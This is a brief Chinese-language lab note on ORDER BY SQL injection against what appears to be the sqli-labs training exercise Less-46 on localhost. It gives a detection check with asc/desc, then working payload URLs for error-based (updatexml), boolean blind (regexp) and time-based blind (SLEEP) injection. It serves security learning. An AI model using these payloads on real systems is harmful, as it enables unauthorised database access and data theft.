order by注入
通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入
http://127.0.0.1:8089/Less-46/?sort=1+asc
http://127.0.0.1:8089/Less-46/?sort=1+desc
报错注入
http://127.0.0.1:8089/Less-46/?sort=1%20and(updatexml(1,concat(0x7e,(select%20database())),0));
布尔盲注
http://127.0.0.1:8089/Less-46/?sort=1%20^(select(select%20version())%20regexp%20%27^5%27)
时间盲注
http://127.0.0.1:8089/Less-46/?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test))